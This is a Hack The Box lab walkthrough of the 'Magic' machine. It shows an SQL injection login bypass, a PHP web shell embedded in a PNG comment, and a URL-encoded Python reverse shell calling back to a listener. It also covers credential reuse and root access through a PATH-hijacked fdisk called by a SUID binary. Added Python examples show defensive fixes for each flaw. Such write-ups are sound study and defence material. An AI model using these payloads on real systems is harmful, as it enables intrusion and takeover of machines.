Magic — HTB walkthrough

Dhanishtha Awasthi
6 min read · Aug 22, 2020


Today we will see how to own the Magic machine. Initially, when I started the machine, I thought it was going to be related to magic numbers in PHP and the type-juggling concept. But no, it was not like that, so let's see how it went.

ENUMERATE

Nmap scan

Aggressive scan for versions with default scripts

Port 80 HTTP Enumeration

Visiting the website

We see a login page.

First I thought it was something related to magic numbers and tried to bypass it using the same-hash method. But that was not the case. So, after a lot of enumeration, I found that SQL injection worked on the username field.

First, capture the request in Burp.

We can see we get a 200 OK HTTP response code but an alert for wrong username or password. So we will fuzz the username and password fields here.

Reference string

admin'# worked for me. Looking at the Burp request:

We get a 302 Found and are successfully logged in using this on the login page.
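The reason admin'# logs us in is that the server splices the username straight into the SQL text, so the quote closes the string and the comment marker discards the password check. As an added example (not code from the walkthrough or from the box's login page), the following Python shows the vulnerable query construction beside the parameterised form it should have used, against a constructed in-memory SQLite database with one sample account. SQLite's line comment is --, whereas MySQL also accepts #, which is why the box needed admin'#; the mechanism is the same.

```python
import sqlite3


def make_db():
    """Constructed sample database: one 'admin' account with a made-up password.
    A real application stores a password hash; this isolates the query-building flaw."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'sample-password')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so user input is parsed as SQL grammar.
    A username of admin'-- closes the literal and comments out the password clause."""
    query = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Binds the values as parameters; the database engine never parses them as SQL."""
    query = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin'--", "anything"))  # (1, 'admin')
    print("safe:      ", login_safe(db, "admin'--", "anything"))        # None
```

The parameterised version returns no row for the injected username because the whole string, quote and comment marker included, is compared as data against the username column.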

Post-login we see an upload option. Trying to upload abcd.php:

This shows us an error which says what file format is required.

I captured the upload request in Burp and tried making changes like the Content-Type to application/x-php, the file name to something like abcd.php.png, or starting the content with format-type bytes like PNG or GIF89a, etc. But none worked. This was because the first few bytes of the image, i.e. its header, were checked to decide whether this was a legitimate or illegitimate image type.

So I decided to embed the payload in a comment in the metadata of a legitimate image. To do this I used exiftool. ExifTool is a free and open-source program for reading, writing, and manipulating image, audio, video, and PDF metadata. It is platform independent, available as both a Perl library and a command-line application. To do this I installed exiftool on Kali.

Then make changes to an image file using it. To accomplish this we will do the following:

1) Download any PNG file.

2) Use exiftool to add a comment to it.

3) Add the data/payload that gives the reverse shell.

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' exploit.png
cp exploit.png exploit.php.png

Now upload this exploit.php.png.
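The upload check above fails for two independent reasons: it trusts the header bytes alone, and it lets the uploader pick a name with two extensions. As an added example (not code from the walkthrough or from the box's upload handler), the following Python constructs a minimal PNG whose tEXt Comment chunk carries a PHP tag, shows that a header-only check accepts it, and then applies the validation a defender would want: every suffix must be on an allow-list, the content must match the declared extension, the body is scanned for PHP opening tags, and the server chooses the stored file name. The allow-list, the regex and the sample files are assumptions of this example.

```python
import os
import re
import secrets
import struct
import zlib

# Magic bytes per allowed extension: the stored extension must match the content.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
# PHP opening tags; finding one inside an "image" means it is not only an image.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def build_png_with_comment(comment: bytes) -> bytes:
    """Constructed 1x1 greyscale PNG carrying a tEXt 'Comment' chunk, the chunk
    exiftool -Comment writes."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # 1x1, 8-bit depth, greyscale
    idat = zlib.compress(b"\x00\x00")  # one scanline: filter byte + one pixel
    return (
        ALLOWED[".png"]
        + chunk(b"IHDR", ihdr)
        + chunk(b"tEXt", b"Comment\x00" + comment)
        + chunk(b"IDAT", idat)
        + chunk(b"IEND", b"")
    )


def magic_only_check(data: bytes) -> bool:
    """The check the box relied on: header bytes only. A PNG with a PHP comment passes."""
    return any(data.startswith(magic) for magic in ALLOWED.values())


def validate_upload(filename: str, data: bytes):
    """Return (True, server_chosen_name) on success or (False, reason) on rejection."""
    parts = os.path.basename(filename).lower().split(".")
    # Every suffix must be allowed, so "exploit.php.png" is rejected on ".php".
    if len(parts) < 2 or any("." + p not in ALLOWED for p in parts[1:]):
        return False, "extension not allowed"
    ext = "." + parts[-1]
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match extension"
    # tEXt chunks are stored uncompressed, so a raw scan sees the exiftool comment.
    # zTXt or EXIF fields can hide it; re-encoding the image server-side is the stronger fix.
    if PHP_TAG.search(data):
        return False, "embedded script tag"
    # The server, not the uploader, picks the stored name: random, one allowed extension.
    return True, secrets.token_hex(16) + ext


if __name__ == "__main__":
    tainted = build_png_with_comment(b"<?php echo 'comment'; ?>")  # constructed sample
    print("header-only check:", magic_only_check(tainted))          # True
    print("exploit.php.png  :", validate_upload("exploit.php.png", tainted))
    print("exploit.png      :", validate_upload("exploit.png", tainted))
    print("holiday.png      :", validate_upload("holiday.png", build_png_with_comment(b"beach")))
```

On the box the file also had to be executed as PHP despite ending in .png; with Apache that happens when PHP is bound through AddHandler, which matches any extension anywhere in the name, rather than through SetHandler inside a FilesMatch limited to names ending in .php. Strict upload validation and a strict handler mapping are separate controls, and either one would have closed this path.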

Now we need the folder and path to access our image. To find it we will run a gobuster scan on Magic.

We get the folder images. But we need something like an upload directory, so we iterate again inside images.

We get uploads.

So our file is at this path: 10.10.10.185/images/uploads/exploit.php.png

EXPLOITATION

We will access the image and get a reverse shell using the cmd parameter we added in our payload.

Using the pentestmonkey reverse-shell cheatsheet, we will use the Python reverse shell. Also don't forget to change your IP and listening port and to URL-encode it before sending it in the cmd parameter. The request looks as follows:

http://10.10.10.185/images/uploads/exploit.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.16%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

Please note: we are using python3, not python. This was trial and error; python didn't work, so I tried python3.

Keeping netcat listening

Getting user

Enumerating through the files, I found the database file that is called to authenticate. We see credentials.

Username: theseus | Password: iamkingtheseus. When I tried to switch user, I could not do it with this password. I enumerated a lot but could not find any different password.

So I decided to connect to MySQL using the above creds.

The mysql client wasn't installed, but mysqldump was, which worked for us.

We get another password.

Now switching user worked.

Now we are theseus on box.

Getting user.txt

PRIVILEGE ESCALATION

Enumerating, we see that user theseus has SUID privileges on /usr/bin/sysinfo.

Going to the location

On checking what we have inside, we see that the fdisk command is called.

The fdisk command-line utility provides disk-partitioning functions. We will exploit it.

We will put a reverse-shell script in place of the fdisk command, so instead of listing partitions, fdisk will give us a reverse shell when it is called via sysinfo as root.

First let's get an SSH-based shell as theseus, just for the sake of easy editing of files. For this, on your machine, generate an RSA key pair.

On the target machine, copy your public key to authorized_keys in theseus's .ssh directory.

We are actually adding our public key to the authorized_keys of theseus, and then using our private key to SSH in as theseus.

On your machine:

Logic to gain a shell as root

After you get the SSH shell, make a file named fdisk, give it execute permissions, change the PATH variable to the present working directory and execute sysinfo.

This will give a reverse shell because, once sysinfo runs and reaches the line fdisk -l, it searches for a command called fdisk and, because of the PATH variable we set, finds our fdisk instead of /bin/fdisk. And in our fdisk we have the reverse-shell code ready to execute.
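From the defender's side, the lesson is that a privileged program must never let the invoking user's environment decide which binary it runs. As an added example (not code from the walkthrough or from the box's sysinfo binary), the following Python puts the two resolution behaviours side by side: a bare command name looked up through the caller's PATH, which is what execvp()/system() do, versus a name pinned to a fixed list of system directories and run under a fresh minimal environment. The directory layout and the two stand-in fdisk scripts are constructed in a temporary directory; the trusted-directory list is an assumption of the example.

```python
import os
import shutil
import stat
import subprocess
import tempfile

# The only directories a privileged program should resolve bare command names from.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve_via_env_path(command: str, env_path: str):
    """What execvp()/system() do with a bare name: first match in the given PATH wins."""
    return shutil.which(command, path=env_path)


def resolve_trusted(command: str, trusted_dirs=TRUSTED_DIRS):
    """Resolve a bare name only against a fixed allow-list; the caller's PATH is never consulted."""
    if not command or "/" in command:
        raise ValueError("expected a bare command name")
    for directory in trusted_dirs:
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def run_privileged(command: str, args, trusted_dirs=TRUSTED_DIRS):
    """Run a helper by absolute path under a minimal environment, so neither PATH nor
    loader variables inherited from the invoking user reach the child process."""
    path = resolve_trusted(command, trusted_dirs)
    if path is None:
        raise FileNotFoundError(command)
    env = {"PATH": os.pathsep.join(trusted_dirs)}
    return subprocess.run([path, *args], env=env, capture_output=True, text=True, check=False)


def _write_script(path: str, message: str) -> None:
    # Constructed stand-in executable; it only reports which copy was run.
    with open(path, "w") as fh:
        fh.write(f"#!/bin/sh\necho '{message}'\n")
    os.chmod(path, os.stat(path).st_mode | stat.S_IRUSR | stat.S_IXUSR)


def demo_resolution():
    """Constructed layout: a 'system' dir holding the legitimate tool and a writable
    working dir holding a look-alike placed first in PATH, as in the walkthrough.
    Returns the path each resolver picks, relative to the temp root."""
    with tempfile.TemporaryDirectory() as root:
        system_dir = os.path.join(root, "sbin")
        work_dir = os.path.join(root, "work")
        os.mkdir(system_dir)
        os.mkdir(work_dir)
        _write_script(os.path.join(system_dir, "fdisk"), "legitimate fdisk")
        _write_script(os.path.join(work_dir, "fdisk"), "look-alike fdisk")
        hijacked_path = work_dir + os.pathsep + system_dir
        return {
            "naive": os.path.relpath(resolve_via_env_path("fdisk", hijacked_path), root),
            "pinned": os.path.relpath(resolve_trusted("fdisk", (system_dir,)), root),
        }


if __name__ == "__main__":
    print(demo_resolution())  # {'naive': 'work/fdisk', 'pinned': 'sbin/fdisk'}
```

In a native setuid program the same rules apply: call helpers by absolute path (or from a compiled-in directory list), reset PATH before any popen()/system(), and drop privileges where the helper does not need them. Auditing SUID binaries for bare command names in their strings, and alerting on execution of a SUID binary with a PATH that begins with a user-writable directory, are the corresponding detection controls.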

To do this, keep a netcat listener running on your machine on the port you like. Then, on the target machine, make the following changes.

Once you see the program stop at the fdisk step, you will find a shell on nc.

ROOTED!!!
